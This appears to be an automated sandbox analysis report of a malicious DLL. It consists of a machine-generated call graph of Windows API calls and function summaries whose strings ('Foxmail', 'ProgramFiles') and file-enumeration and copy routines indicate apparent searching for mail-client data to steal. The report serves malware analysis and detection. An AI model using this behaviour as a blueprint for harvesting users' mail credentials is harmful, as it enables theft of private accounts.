7013 23235b7a _abort 20 API calls 7012->7013 7014 2323635a 7013->7014 7014->6997 7015->7000 7017 23239b3b 7016->7017 7054 23239b34 7016->7054 7018 23239b3f 7017->7018 7019 23239b5e 7017->7019 7020 23236355 __dosmaperr 20 API calls 7018->7020 7023 23239baf 7019->7023 7024 23239b92 7019->7024 7022 23239b44 7020->7022 7021 23232ada _ValidateLocalCookies 5 API calls 7025 23239d15 7021->7025 7026 23236368 _free 20 API calls 7022->7026 7027 23239bc5 7023->7027 7070 2323a00b 7023->7070 7028 23236355 __dosmaperr 20 API calls 7024->7028 7025->7009 7029 23239b4b 7026->7029 7073 232396b2 7027->7073 7032 23239b97 7028->7032 7034 232362ac _abort 26 API calls 7029->7034 7033 23236368 _free 20 API calls 7032->7033 7036 23239b9f 7033->7036 7034->7054 7039 232362ac _abort 26 API calls 7036->7039 7037 23239bd3 7042 23239bd7 7037->7042 7043 23239bf9 7037->7043 7038 23239c0c 7040 23239c20 7038->7040 7041 23239c66 WriteFile 7038->7041 7039->7054 7046 23239c56 7040->7046 7047 23239c28 7040->7047 7044 23239c89 GetLastError 7041->7044 7050 23239bef 7041->7050 7048 23239ccd 7042->7048 7080 23239645 7042->7080 7085 23239492 GetConsoleCP 7043->7085 7044->7050 7111 23239728 7046->7111 7051 23239c46 7047->7051 7052 23239c2d 7047->7052 7048->7054 7055 23236368 _free 20 API calls 7048->7055 7050->7048 7050->7054 7058 23239ca9 7050->7058 7103 232398f5 7051->7103 7052->7048 7096 23239807 7052->7096 7054->7021 7057 23239cf2 7055->7057 7060 23236355 __dosmaperr 20 API calls 7057->7060 7061 23239cb0 7058->7061 7062 23239cc4 7058->7062 7060->7054 7063 23236368 _free 20 API calls 7061->7063 7118 23236332 7062->7118 7065 23239cb5 7063->7065 7066 23236355 __dosmaperr 20 API calls 7065->7066 7066->7054 7159 23238c9e RtlLeaveCriticalSection 7067->7159 7069 23239aea 7069->7006 7123 23239f8d 7070->7123 7145 23238dbc 7073->7145 7075 232396c2 7076 232396c7 7075->7076 7077 23235af6 _abort 38 API calls 7075->7077 7076->7037 7076->7038 7078 232396ea 7077->7078 7078->7076 7079 23239708 GetConsoleMode 7078->7079 7079->7076 7081 2323966a 7080->7081 7084 2323969f 7080->7084 7082 2323a181 WriteConsoleW CreateFileW 7081->7082 7083 232396a1 GetLastError 7081->7083 7081->7084 7082->7081 7083->7084 7084->7050 7086 23239607 7085->7086 7090 232394f5 7085->7090 7087 23232ada _ValidateLocalCookies 5 API calls 7086->7087 7088 23239641 7087->7088 7088->7050 7090->7086 7091 2323957b WideCharToMultiByte 7090->7091 7093 232379e6 40 API calls __fassign 7090->7093 7095 232395d2 WriteFile 7090->7095 7154 23237c19 7090->7154 7091->7086 7092 232395a1 WriteFile 7091->7092 7092->7090 7094 2323962a GetLastError 7092->7094 7093->7090 7094->7086 7095->7090 7095->7094 7100 23239816 7096->7100 7097 232398d8 7099 23232ada _ValidateLocalCookies 5 API calls 7097->7099 7098 23239894 WriteFile 7098->7100 7101 232398da GetLastError 7098->7101 7102 232398f1 7099->7102 7100->7097 7100->7098 7101->7097 7102->7050 7110 23239904 7103->7110 7104 23239a0f 7105 23232ada _ValidateLocalCookies 5 API calls 7104->7105 7107 23239a1e 7105->7107 7106 23239986 WideCharToMultiByte 7108 23239a07 GetLastError 7106->7108 7109 232399bb WriteFile 7106->7109 7107->7050 7108->7104 7109->7108 7109->7110 7110->7104 7110->7106 7110->7109 7115 23239737 7111->7115 7112 232397ea 7113 23232ada _ValidateLocalCookies 5 API calls 7112->7113 7117 23239803 7113->7117 7114 232397a9 WriteFile 7114->7115 7116 232397ec GetLastError 7114->7116 7115->7112 7115->7114 7116->7112 7117->7050 7119 23236355 __dosmaperr 20 API calls 7118->7119 7120 2323633d _free 7119->7120 7121 23236368 _free 20 API calls 7120->7121 7122 23236350 7121->7122 7122->7054 7132 23238d52 7123->7132 7125 23239f9f 7126 23239fa7 7125->7126 7127 23239fb8 SetFilePointerEx 7125->7127 7130 23236368 _free 20 API calls 7126->7130 7128 23239fd0 GetLastError 7127->7128 7129 23239fac 7127->7129 7131 23236332 __dosmaperr 20 API calls 7128->7131 7129->7027 7130->7129 7131->7129 7133 23238d74 7132->7133 7134 23238d5f 7132->7134 7136 23236355 __dosmaperr 20 API calls 7133->7136 7140 23238d99 7133->7140 7135 23236355 __dosmaperr 20 API calls 7134->7135 7137 23238d64 7135->7137 7138 23238da4 7136->7138 7139 23236368 _free 20 API calls 7137->7139 7141 23236368 _free 20 API calls 7138->7141 7142 23238d6c 7139->7142 7140->7125 7143 23238dac 7141->7143 7142->7125 7144 232362ac _abort 26 API calls 7143->7144 7144->7142 7146 23238dd6 7145->7146 7147 23238dc9 7145->7147 7150 23238de2 7146->7150 7151 23236368 _free 20 API calls 7146->7151 7148 23236368 _free 20 API calls 7147->7148 7149 23238dce 7148->7149 7149->7075 7150->7075 7152 23238e03 7151->7152 7153 232362ac _abort 26 API calls 7152->7153 7153->7149 7155 23235af6 _abort 38 API calls 7154->7155 7156 23237c24 7155->7156 7157 23237a00 __fassign 38 API calls 7156->7157 7158 23237c34 7157->7158 7158->7090 7159->7069 7163 2323ad24 7160->7163 7162 2323adca 7162->6985 7164 2323ad30 ___DestructExceptionObject 7163->7164 7174 23238c7b RtlEnterCriticalSection 7164->7174 7166 2323ad3e 7167 2323ad70 7166->7167 7168 2323ad65 7166->7168 7169 23236368 _free 20 API calls 7167->7169 7175 2323ae4d 7168->7175 7171 2323ad6b 7169->7171 7190 2323ad9a 7171->7190 7173 2323ad8d _abort 7173->7162 7174->7166 7176 23238d52 26 API calls 7175->7176 7179 2323ae5d 7176->7179 7177 2323ae63 7193 23238cc1 7177->7193 7178 2323ae95 7178->7177 7182 23238d52 26 API calls 7178->7182 7179->7177 7179->7178 7181 23238d52 26 API calls 7179->7181 7184 2323ae8c 7181->7184 7185 2323aea1 CloseHandle 7182->7185 7187 23238d52 26 API calls 7184->7187 7185->7177 7188 2323aead GetLastError 7185->7188 7186 2323aedd 7186->7171 7187->7178 7188->7177 7189 23236332 __dosmaperr 20 API calls 7189->7186 7202 23238c9e RtlLeaveCriticalSection 7190->7202 7192 2323ada4 7192->7173 7194 23238cd0 7193->7194 7195 23238d37 7193->7195 7194->7195 7201 23238cfa 7194->7201 7196 23236368 _free 20 API calls 7195->7196 7197 23238d3c 7196->7197 7198 23236355 __dosmaperr 20 API calls 7197->7198 7199 23238d27 7198->7199 7199->7186 7199->7189 7200 23238d21 SetStdHandle 7200->7199 7201->7199 7201->7200 7202->7192 7203->6958 7204->6938 7205 2323284f 7206 23232882 std::exception::exception 27 API calls 7205->7206 7207 2323285d 7206->7207 7208 2323724e GetProcessHeap 6474 2323220c 6475 23232215 6474->6475 6476 2323221a dllmain_dispatch 6474->6476 6478 232322b1 6475->6478 6479 232322c7 6478->6479 6481 232322d0 6479->6481 6482 23232264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6479->6482 6481->6476 6482->6481 7209 23235351 7210 23235360 7209->7210 7211 23235374 7209->7211 7210->7211 7213 2323571e _free 20 API calls 7210->7213 7212 2323571e _free 20 API calls 7211->7212 7214 23235386 7212->7214 7213->7211 7215 2323571e _free 20 API calls 7214->7215 7216 23235399 7215->7216 7217 2323571e _free 20 API calls 7216->7217 7218 232353aa 7217->7218 7219 2323571e _free 20 API calls 7218->7219 7220 232353bb 7219->7220 7489 23233c90 RtlUnwind 7581 232336d0 7582 232336e2 7581->7582 7584 232336f0 @_EH4_CallFilterFunc@8 7581->7584 7583 23232ada _ValidateLocalCookies 5 API calls 7582->7583 7583->7584 7585 23234ed7 7586 23236d60 51 API calls 7585->7586 7587 23234ee9 7586->7587 7596 23237153 GetEnvironmentStringsW 7587->7596 7591 2323571e _free 20 API calls 7592 23234f29 7591->7592 7593 23234eff 7594 2323571e _free 20 API calls 7593->7594 7595 23234ef4 7594->7595 7595->7591 7597 232371bd 7596->7597 7598 2323716a 7596->7598 7599 232371c6 FreeEnvironmentStringsW 7597->7599 7600 23234eee 7597->7600 7601 23237170 WideCharToMultiByte 7598->7601 7599->7600 7600->7595 7608 23234f2f 7600->7608 7601->7597 7602 2323718c 7601->7602 7603 232356d0 21 API calls 7602->7603 7604 23237192 7603->7604 7605 232371af 7604->7605 7606 23237199 WideCharToMultiByte 7604->7606 7607 2323571e _free 20 API calls 7605->7607 7606->7605 7607->7597 7609 23234f44 7608->7609 7610 2323637b _abort 20 API calls 7609->7610 7621 23234f6b 7610->7621 7611 23234fcf 7612 2323571e _free 20 API calls 7611->7612 7613 23234fe9 7612->7613 7613->7593 7614 2323637b _abort 20 API calls 7614->7621 7615 23234fd1 7616 23235000 20 API calls 7615->7616 7618 23234fd7 7616->7618 7617 2323544d ___std_exception_copy 26 API calls 7617->7621 7619 2323571e _free 20 API calls 7618->7619 7619->7611 7620 23234ff3 7622 232362bc _abort 11 API calls 7620->7622 7621->7611 7621->7614 7621->7615 7621->7617 7621->7620 7623 2323571e _free 20 API calls 7621->7623 7624 23234fff 7622->7624 7623->7621 7625 232373d5 7626 232373e1 ___DestructExceptionObject 7625->7626 7637 23235671 RtlEnterCriticalSection 7626->7637 7628 232373e8 7638 23238be3 7628->7638 7630 232373f7 7631 23237406 7630->7631 7651 23237269 GetStartupInfoW 7630->7651 7662 23237422 7631->7662 7635 23237417 _abort 7637->7628 7639 23238bef ___DestructExceptionObject 7638->7639 7640 23238c13 7639->7640 7641 23238bfc 7639->7641 7665 23235671 RtlEnterCriticalSection 7640->7665 7643 23236368 _free 20 API calls 7641->7643 7644 23238c01 7643->7644 7645 232362ac _abort 26 API calls 7644->7645 7647 23238c0b _abort 7645->7647 7646 23238c4b 7673 23238c72 7646->7673 7647->7630 7648 23238c1f 7648->7646 7666 23238b34 7648->7666 7652 23237286 7651->7652 7653 23237318 7651->7653 7652->7653 7654 23238be3 27 API calls 7652->7654 7657 2323731f 7653->7657 7655 232372af 7654->7655 7655->7653 7656 232372dd GetFileType 7655->7656 7656->7655 7658 23237326 7657->7658 7659 23237369 GetStdHandle 7658->7659 7660 232373d1 7658->7660 7661 2323737c GetFileType 7658->7661 7659->7658 7660->7631 7661->7658 7677 232356b9 RtlLeaveCriticalSection 7662->7677 7664 23237429 7664->7635 7665->7648 7667 2323637b _abort 20 API calls 7666->7667 7669 23238b46 7667->7669 7668 2323571e _free 20 API calls 7671 23238ba5 7668->7671 7670 23235eb7 11 API calls 7669->7670 7672 23238b53 7669->7672 7670->7669 7671->7648 7672->7668 7676 232356b9 RtlLeaveCriticalSection 7673->7676 7675 23238c79 7675->7647 7676->7675 7677->7664 5864 23231c5b 5865 23231c6b ___scrt_fastfail 5864->5865 5868 232312ee 5865->5868 5867 23231c87 5869 23231324 ___scrt_fastfail 5868->5869 5870 232313b7 GetEnvironmentVariableW 5869->5870 5894 232310f1 5870->5894 5873 232310f1 57 API calls 5874 23231465 5873->5874 5875 232310f1 57 API calls 5874->5875 5876 23231479 5875->5876 5877 232310f1 57 API calls 5876->5877 5878 2323148d 5877->5878 5879 232310f1 57 API calls 5878->5879 5880 232314a1 5879->5880 5881 232310f1 57 API calls 5880->5881 5882 232314b5 lstrlenW 5881->5882 5883 232314d2 5882->5883 5884 232314d9 lstrlenW 5882->5884 5883->5867 5885 232310f1 57 API calls 5884->5885 5886 23231501 lstrlenW lstrcatW 5885->5886 5887 232310f1 57 API calls 5886->5887 5888 23231539 lstrlenW lstrcatW 5887->5888 5889 232310f1 57 API calls 5888->5889 5890 2323156b lstrlenW lstrcatW 5889->5890 5891 232310f1 57 API calls 5890->5891 5892 2323159d lstrlenW lstrcatW 5891->5892 5893 232310f1 57 API calls 5892->5893 5893->5883 5895 23231118 ___scrt_fastfail 5894->5895 5896 23231129 lstrlenW 5895->5896 5907 23232c40 5896->5907 5899 23231177 lstrlenW FindFirstFileW 5901 232311e1 5899->5901 5902 232311a0 5899->5902 5900 23231168 lstrlenW 5900->5899 5901->5873 5903 232311c7 FindNextFileW 5902->5903 5906 232311aa 5902->5906 5903->5902 5905 232311da FindClose 5903->5905 5905->5901 5906->5903 5909 23231000 5906->5909 5908 23231148 lstrcatW lstrlenW 5907->5908 5908->5899 5908->5900 5910 23231022 ___scrt_fastfail 5909->5910 5911 232310af 5910->5911 5912 2323102f lstrcatW lstrlenW 5910->5912 5913 232310b5 lstrlenW 5911->5913 5924 232310ad 5911->5924 5914 2323106b lstrlenW 5912->5914 5915 2323105a lstrlenW 5912->5915 5940 23231e16 5913->5940 5926 23231e89 lstrlenW 5914->5926 5915->5914 5918 232310ca 5921 23231e89 5 API calls 5918->5921 5918->5924 5919 23231088 GetFileAttributesW 5920 2323109c 5919->5920 5919->5924 5920->5924 5932 2323173a 5920->5932 5923 232310df 5921->5923 5945 232311ea 5923->5945 5924->5906 5927 23232c40 ___scrt_fastfail 5926->5927 5928 23231ea7 lstrcatW lstrlenW 5927->5928 5929 23231ec2 5928->5929 5930 23231ed1 lstrcatW 5928->5930 5929->5930 5931 23231ec7 lstrlenW 5929->5931 5930->5919 5931->5930 5933 23231747 ___scrt_fastfail 5932->5933 5960 23231cca 5933->5960 5937 2323199f 5937->5924 5938 23231824 ___scrt_fastfail _strlen 5938->5937 5980 232315da 5938->5980 5941 23231e29 5940->5941 5944 23231e4c 5940->5944 5942 23231e2d lstrlenW 5941->5942 5941->5944 5943 23231e3f lstrlenW 5942->5943 5942->5944 5943->5944 5944->5918 5946 2323120e ___scrt_fastfail 5945->5946 5947 23231e89 5 API calls 5946->5947 5948 23231220 GetFileAttributesW 5947->5948 5949 23231246 5948->5949 5950 23231235 5948->5950 5951 23231e89 5 API calls 5949->5951 5950->5949 5952 2323173a 35 API calls 5950->5952 5953 23231258 5951->5953 5952->5949 5954 232310f1 56 API calls 5953->5954 5955 2323126d 5954->5955 5956 23231e89 5 API calls 5955->5956 5957 2323127f ___scrt_fastfail 5956->5957 5958 232310f1 56 API calls 5957->5958 5959 232312e6 5958->5959 5959->5924 5961 23231cf1 ___scrt_fastfail 5960->5961 5962 23231d0f CopyFileW CreateFileW 5961->5962 5963 23231d55 GetFileSize 5962->5963 5964 23231d44 DeleteFileW 5962->5964 5965 23231ede 22 API calls 5963->5965 5969 23231808 5964->5969 5966 23231d66 ReadFile 5965->5966 5967 23231d94 CloseHandle DeleteFileW 5966->5967 5968 23231d7d CloseHandle DeleteFileW 5966->5968 5967->5969 5968->5969 5969->5937 5970 23231ede 5969->5970 5972 2323222f 5970->5972 5973 2323224e 5972->5973 5975 23232250 5972->5975 5988 2323474f 5972->5988 5993 232347e5 5972->5993 5973->5938 5976 23232908 5975->5976 6000 232335d2 5975->6000 5977 232335d2 __CxxThrowException@8 RaiseException 5976->5977 5978 23232925 5977->5978 5978->5938 5981 2323160c _strcat _strlen 5980->5981 5982 2323163c lstrlenW 5981->5982 6088 23231c9d 5982->6088 5984 23231655 lstrcatW lstrlenW 5985 23231678 5984->5985 5986 23231693 ___scrt_fastfail 5985->5986 5987 2323167e lstrcatW 5985->5987 5986->5938 5987->5986 6003 23234793 5988->6003 5990 23234765 6009 23232ada 5990->6009 5992 2323478f 5992->5972 5998 232356d0 _abort 5993->5998 5994 2323570e 6022 23236368 5994->6022 5996 232356f9 RtlAllocateHeap 5997 2323570c 5996->5997 5996->5998 5997->5972 5998->5994 5998->5996 5999 2323474f _abort 7 API calls 5998->5999 5999->5998 6002 232335f2 RaiseException 6000->6002 6002->5976 6004 2323479f ___DestructExceptionObject 6003->6004 6016 23235671 RtlEnterCriticalSection 6004->6016 6006 232347aa 6017 232347dc 6006->6017 6008 232347d1 _abort 6008->5990 6010 23232ae3 6009->6010 6011 23232ae5 IsProcessorFeaturePresent 6009->6011 6010->5992 6013 23232b58 6011->6013 6021 23232b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6013->6021 6015 23232c3b 6015->5992 6016->6006 6020 232356b9 RtlLeaveCriticalSection 6017->6020 6019 232347e3 6019->6008 6020->6019 6021->6015 6025 23235b7a GetLastError 6022->6025 6026 23235b93 6025->6026 6029 23235b99 6025->6029 6044 23235e08 6026->6044 6031 23235bf0 SetLastError 6029->6031 6051 2323637b 6029->6051 6034 23235bf9 6031->6034 6032 23235bb3 6058 2323571e 6032->6058 6034->5997 6037 23235bb9 6039 23235be7 SetLastError 6037->6039 6038 23235bcf 6071 2323593c 6038->6071 6039->6034 6042 2323571e _free 17 API calls 6043 23235be0 6042->6043 6043->6031 6043->6039 6076 23235c45 6044->6076 6046 23235e2f 6047 23235e47 TlsGetValue 6046->6047 6048 23235e3b 6046->6048 6047->6048 6049 23232ada _ValidateLocalCookies 5 API calls 6048->6049 6050 23235e58 6049->6050 6050->6029 6056 23236388 _abort 6051->6056 6052 232363c8 6055 23236368 _free 19 API calls 6052->6055 6053 232363b3 RtlAllocateHeap 6054 23235bab 6053->6054 6053->6056 6054->6032 6064 23235e5e 6054->6064 6055->6054 6056->6052 6056->6053 6057 2323474f _abort 7 API calls 6056->6057 6057->6056 6059 23235752 _free 6058->6059 6060 23235729 HeapFree 6058->6060 6059->6037 6060->6059 6061 2323573e 6060->6061 6062 23236368 _free 18 API calls 6061->6062 6063 23235744 GetLastError 6062->6063 6063->6059 6065 23235c45 _abort 5 API calls 6064->6065 6066 23235e85 6065->6066 6067 23235ea0 TlsSetValue 6066->6067 6069 23235e94 6066->6069 6067->6069 6068 23232ada _ValidateLocalCookies 5 API calls 6070 23235bc8 6068->6070 6069->6068 6070->6032 6070->6038 6082 23235914 6071->6082 6079 23235c71 6076->6079 6081 23235c75 __crt_fast_encode_pointer 6076->6081 6077 23235c95 6080 23235ca1 GetProcAddress 6077->6080 6077->6081 6078 23235ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6078->6079 6079->6077 6079->6078 6079->6081 6080->6081 6081->6046 6083 23235854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6082->6083 6084 23235938 6083->6084 6085 232358c4 6084->6085 6086 23235758 _abort 20 API calls 6085->6086 6087 232358e8 6086->6087 6087->6042 6089 23231ca6 _strlen 6088->6089 6089->5984 7678 232320db 7679 232320e7 ___DestructExceptionObject 7678->7679 7680 23232110 dllmain_raw 7679->7680 7684 2323210b 7679->7684 7690 232320f6 7679->7690 7681 2323212a 7680->7681 7680->7690 7691 23231eec 7681->7691 7683 23232177 7685 23231eec 31 API calls 7683->7685 7683->7690 7684->7683 7687 23231eec 31 API calls 7684->7687 7684->7690 7686 2323218a 7685->7686 7688 23232193 dllmain_raw 7686->7688 7686->7690 7689 2323216d dllmain_raw 7687->7689 7688->7690 7689->7683 7692 23231ef7 7691->7692 7693 23231f2a dllmain_crt_process_detach 7691->7693 7695 23231f1c dllmain_crt_process_attach 7692->7695 7696 23231efc 7692->7696 7694 23231f06 7693->7694 7694->7684 7695->7694 7697 23231f12 7696->7697 7698 23231f01 7696->7698 7706 232323ec 7697->7706 7698->7694 7701 2323240b 7698->7701 7714 232353e5 7701->7714 7807 23233513 7706->7807 7709 232323f5 7709->7694 7712 23232408 7712->7694 7713 2323351e 7 API calls 7713->7709 7720 23235aca 7714->7720 7717 2323351e 7796 23233820 7717->7796 7719 23232415 7719->7694 7721 23235ad4 7720->7721 7724 23232410 7720->7724 7722 23235e08 _abort 11 API calls 7721->7722 7723 23235adb 7722->7723 7723->7724 7725 23235e5e _abort 11 API calls 7723->7725 7724->7717 7726 23235aee 7725->7726 7728 232359b5 7726->7728 7729 232359c0 7728->7729 7733 232359d0 7728->7733 7734 232359d6 7729->7734 7732 2323571e _free 20 API calls 7732->7733 7733->7724 7735 232359ef 7734->7735 7736 232359e9 7734->7736 7737 2323571e _free 20 API calls 7735->7737 7738 2323571e _free 20 API calls 7736->7738 7739 232359fb 7737->7739 7738->7735 7740 2323571e _free 20 API calls 7739->7740 7741 23235a06 7740->7741 7742 2323571e _free 20 API calls 7741->7742 7743 23235a11 7742->7743 7744 2323571e _free 20 API calls 7743->7744 7745 23235a1c 7744->7745 7746 2323571e _free 20 API calls 7745->7746 7747 23235a27 7746->7747 7748 2323571e _free 20 API calls 7747->7748 7749 23235a32 7748->7749 7750 2323571e _free 20 API calls 7749->7750 7751 23235a3d 7750->7751 7752 2323571e _free 20 API calls 7751->7752 7753 23235a48 7752->7753 7754 2323571e _free 20 API calls 7753->7754 7755 23235a56 7754->7755 7760 2323589c 7755->7760 7766 232357a8 7760->7766 7762 232358c0 7763 232358ec 7762->7763 7779 23235809 7763->7779 7765 23235910 7765->7732 7767 232357b4 ___DestructExceptionObject 7766->7767 7774 23235671 RtlEnterCriticalSection 7767->7774 7770 232357be 7771 2323571e _free 20 API calls 7770->7771 7773 232357e8 7770->7773 7771->7773 7772 232357f5 _abort 7772->7762 7775 232357fd 7773->7775 7774->7770 7778 232356b9 RtlLeaveCriticalSection 7775->7778 7777 23235807 7777->7772 7778->7777 7780 23235815 ___DestructExceptionObject 7779->7780 7787 23235671 RtlEnterCriticalSection 7780->7787 7782 2323581f 7788 23235a7f 7782->7788 7784 23235832 7792 23235848 7784->7792 7786 23235840 _abort 7786->7765 7787->7782 7789 23235a8e __fassign 7788->7789 7791 23235ab5 __fassign 7788->7791 7790 23237cc2 __fassign 20 API calls 7789->7790 7789->7791 7790->7791 7791->7784 7795 232356b9 RtlLeaveCriticalSection 7792->7795 7794 23235852 7794->7786 7795->7794 7797 2323382d 7796->7797 7801 2323384b ___vcrt_freefls@4 7796->7801 7798 2323383b 7797->7798 7802 23233b67 7797->7802 7800 23233ba2 ___vcrt_FlsSetValue 6 API calls 7798->7800 7800->7801 7801->7719 7803 23233a82 try_get_function 5 API calls 7802->7803 7804 23233b81 7803->7804 7805 23233b99 TlsGetValue 7804->7805 7806 23233b8d 7804->7806 7805->7806 7806->7798 7813 23233856 7807->7813 7809 232323f1 7809->7709 7810 232353da 7809->7810 7811 23235b7a _abort 20 API calls 7810->7811 7812 232323fd 7811->7812 7812->7712 7812->7713 7814 23233862 GetLastError 7813->7814 7815 2323385f 7813->7815 7816 23233b67 ___vcrt_FlsGetValue 6 API calls 7814->7816 7815->7809 7817 23233877 7816->7817 7818 232338dc SetLastError 7817->7818 7819 23233ba2 ___vcrt_FlsSetValue 6 API calls 7817->7819 7824 23233896 7817->7824 7818->7809 7820 23233890 7819->7820 7821 232338b8 7820->7821 7822 23233ba2 ___vcrt_FlsSetValue 6 API calls 7820->7822 7820->7824 7823 23233ba2 ___vcrt_FlsSetValue 6 API calls 7821->7823 7821->7824 7822->7821 7823->7824 7824->7818 7490 23234a9a 7491 23235411 38 API calls 7490->7491 7492 23234aa2 7491->7492 6483 23232418 6484 23232420 ___scrt_release_startup_lock 6483->6484 6487 232347f5 6484->6487 6486 23232448 6488 23234804 6487->6488 6489 23234808 6487->6489 6488->6486 6492 23234815 6489->6492 6493 23235b7a _abort 20 API calls 6492->6493 6496 2323482c 6493->6496 6494 23232ada _ValidateLocalCookies 5 API calls 6495 23234811 6494->6495 6495->6486 6496->6494 7825 23234bdd 7826 23234c08 7825->7826 7827 23234bec 7825->7827 7828 23236d60 51 API calls 7826->7828 7827->7826 7829 23234bf2 7827->7829 7830 23234c0f GetModuleFileNameA 7828->7830 7831 23236368 _free 20 API calls 7829->7831 7833 23234c33 7830->7833 7832 23234bf7 7831->7832 7834 232362ac _abort 26 API calls 7832->7834 7848 23234d01 7833->7848 7835 23234c01 7834->7835 7838 23234e76 20 API calls 7839 23234c5d 7838->7839 7840 23234c72 7839->7840 7841 23234c66 7839->7841 7843 23234d01 38 API calls 7840->7843 7842 23236368 _free 20 API calls 7841->7842 7847 23234c6b 7842->7847 7844 23234c88 7843->7844 7846 2323571e _free 20 API calls 7844->7846 7844->7847 7845 2323571e _free 20 API calls 7845->7835 7846->7847 7847->7845 7850 23234d26 7848->7850 7852 23234d86 7850->7852 7854 232370eb 7850->7854 7851 23234c50 7851->7838 7852->7851 7853 232370eb 38 API calls 7852->7853 7853->7852 7857 23237092 7854->7857 7858 232354a7 __fassign 38 API calls 7857->7858 7859 232370a6 7858->7859 7859->7850 6497 2323281c 6500 23232882 6497->6500 6503 23233550 6500->6503 6502 2323282a 6504 2323355d 6503->6504 6507 2323358a 6503->6507 6505 232347e5 ___std_exception_copy 21 API calls 6504->6505 6504->6507 6506 2323357a 6505->6506 6506->6507 6509 2323544d 6506->6509 6507->6502 6510 23235468 6509->6510 6511 2323545a 6509->6511 6512 23236368 _free 20 API calls 6510->6512 6511->6510 6516 2323547f 6511->6516 6513 23235470 6512->6513 6514 232362ac _abort 26 API calls 6513->6514 6515 2323547a 6514->6515 6515->6507 6516->6515 6517 23236368 _free 20 API calls 6516->6517 6517->6513

                                                                            Executed Functions

                                                                            Function 232310F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23231137
                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231151
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323115C
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323116D
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323117C
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231193
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 232311D0
                                                                            • FindClose.KERNEL32(00000000), ref: 232311DB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                            • String ID:
                                                                            • API String ID: 1083526818-0
                                                                            • Opcode ID: a16ffdbcfb5b15a723141e7cd465aa028e1f778265c81a52d0141a42a27a0935
                                                                            • Instruction ID: 40b4274f53672d6d0d65c06fb74750a4a47f7ea25b63d2bb1bd667ccb8dbead2
                                                                            • Opcode Fuzzy Hash: a16ffdbcfb5b15a723141e7cd465aa028e1f778265c81a52d0141a42a27a0935
                                                                            • Instruction Fuzzy Hash: 2521E1B25043586BC720FA64DC4CFCB7B9CEF84714F040D2ABA98D3090EB74E2458796
                                                                            Function 232312EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23231434
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23231137
                                                                              • Part of subcall function 232310F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231151
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323115C
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323116D
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323117C
                                                                              • Part of subcall function 232310F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231193
                                                                              • Part of subcall function 232310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 232311D0
                                                                              • Part of subcall function 232310F1: FindClose.KERNEL32(00000000), ref: 232311DB
                                                                            • lstrlenW.KERNEL32(?), ref: 232314C5
                                                                            • lstrlenW.KERNEL32(?), ref: 232314E0
                                                                            • lstrlenW.KERNEL32(?,?), ref: 2323150F
                                                                            • lstrcatW.KERNEL32(00000000), ref: 23231521
                                                                            • lstrlenW.KERNEL32(?,?), ref: 23231547
                                                                            • lstrcatW.KERNEL32(00000000), ref: 23231553
                                                                            • lstrlenW.KERNEL32(?,?), ref: 23231579
                                                                            • lstrcatW.KERNEL32(00000000), ref: 23231585
                                                                            • lstrlenW.KERNEL32(?,?), ref: 232315AB
                                                                            • lstrcatW.KERNEL32(00000000), ref: 232315B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                            • API String ID: 672098462-2938083778
                                                                            • Opcode ID: 06ecf8fa8914c67ecc65719c1a4e25ef6ce80722e705a4b04760fa9bad901fed
                                                                            • Instruction ID: a1af3b83eabb4511a64cb1bce098780ae9b164adbf93623a75a6b00b3cb4dd4b
                                                                            • Opcode Fuzzy Hash: 06ecf8fa8914c67ecc65719c1a4e25ef6ce80722e705a4b04760fa9bad901fed
